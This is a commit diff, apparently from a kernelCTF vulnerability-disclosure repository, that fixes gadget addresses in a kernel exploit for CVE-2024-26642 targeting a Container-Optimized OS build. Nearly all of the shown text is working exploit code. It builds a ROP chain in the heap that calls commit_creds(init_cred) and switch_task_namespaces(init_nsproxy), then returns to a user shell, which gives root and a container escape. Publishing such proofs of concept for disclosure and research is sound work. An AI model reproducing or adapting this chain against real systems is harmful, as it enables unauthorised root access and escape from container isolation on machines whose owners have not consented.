Fix error

google · Sep 3, 2024 · be64935 · be64935
1 parent 7279226
commit be64935
Show file tree

Hide file tree

Showing 2 changed files with 6 additions and 6 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit.c b/pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit.c
@@ -381,25 +381,25 @@ void leak_and_prepare_rop(struct nl_sock *socket){
     nl_recvmsgs_default(socket2);
     printf("Leak end.\n");
     printf("Start preparing ROP gadget in heap.\n");
-    kernel_off = leak_ops - 0xFFFFFFFF82ACB940;
+    kernel_off = leak_ops - 0xFFFFFFFF82ACB840;
     char *ops = malloc(0x100);
     //ops->dump
-    *(uint64_t *)&ops[0x40] = kernel_off + 0xffffffff811b0023;//leave ; ret
+    *(uint64_t *)&ops[0x40] = kernel_off + 0xFFFFFFFF81519693;//leave ; ret
     //ops->type
     *(uint64_t *)&ops[0x70] = kernel_off + 0xFFFFFFFF8371BF00;//last type
 
-    *(uint64_t *)&ops[0x08] = kernel_off + 0xFFFFFFFF8188510D;//pop rdi; ret
+    *(uint64_t *)&ops[0x08] = kernel_off + 0xffffffff81081910;//pop rdi; ret
     *(uint64_t *)&ops[0x10] = kernel_off + 0xFFFFFFFF83462180;//init_cred
     *(uint64_t *)&ops[0x18] = kernel_off + 0xFFFFFFFF8110E830;//commit_creds;
     *(uint64_t *)&ops[0x20] = kernel_off + 0xffffffff81068153;//pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
     *(uint64_t *)&ops[0x28] = 1;
     *(uint64_t *)&ops[0x58] = kernel_off + 0xFFFFFFFF81105680;//find_task_by_vpid
     *(uint64_t *)&ops[0x60] = kernel_off + 0xFFFFFFFF8106815A;//pop rbp ; pop rbx ; ret ; because ops->0x70 is the last_type
     *(uint64_t *)&ops[0x78] = kernel_off + 0xffffffff8102c701;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
-    *(uint64_t *)&ops[0x88] = kernel_off + 0xffffffff811aaf4a;//pop rsi ; ret
+    *(uint64_t *)&ops[0x88] = kernel_off + 0xFFFFFFFF817E4E5E;//pop rsi ; ret
     *(uint64_t *)&ops[0x90] = kernel_off + 0xFFFFFFFF83461F40;//init_nsproxy
     *(uint64_t *)&ops[0x98] = kernel_off + 0xFFFFFFFF8110CE30;//switch_task_namespaces
-    *(uint64_t *)&ops[0xa0] = kernel_off + 0xffffffff82002127;//swapgs; ret
+    *(uint64_t *)&ops[0xa0] = kernel_off + 0xFFFFFFFF82002117;//swapgs; ret
     *(uint64_t *)&ops[0xa8] = kernel_off + 0xFFFFFFFF822011A7;//iretq
     *(uint64_t *)&ops[0xb0] = (uint64_t)shell;
     *(uint64_t *)&ops[0xb8] = user_cs;
@@ -460,7 +460,7 @@ void jmp_rop(struct nl_sock * socket){
     del_chain(socket, table, target_chain);
     //step 4 create normal set elem with expr, make offsetof(chain->use) == offsetof(expr->size)
     *(uint64_t *)&pad[0] = target_heap;//expr->ops
-    *(uint64_t *)&pad[8] = kernel_off + 0xffffffff811b0023;//leave ; ret
+    *(uint64_t *)&pad[8] = kernel_off + 0xFFFFFFFF81519693;//leave ; ret
     for(i=0;i<0x1000;i++){
     	*(uint64_t *)hash_key_48 = i;
 	new_setelem_with_expr_and_elemdata(socket, table, hash_set_for_expr, pad, 0x10, NULL, hash_key_48, 48, NULL, 0);

diff --git a/pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/exploit b/pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/exploit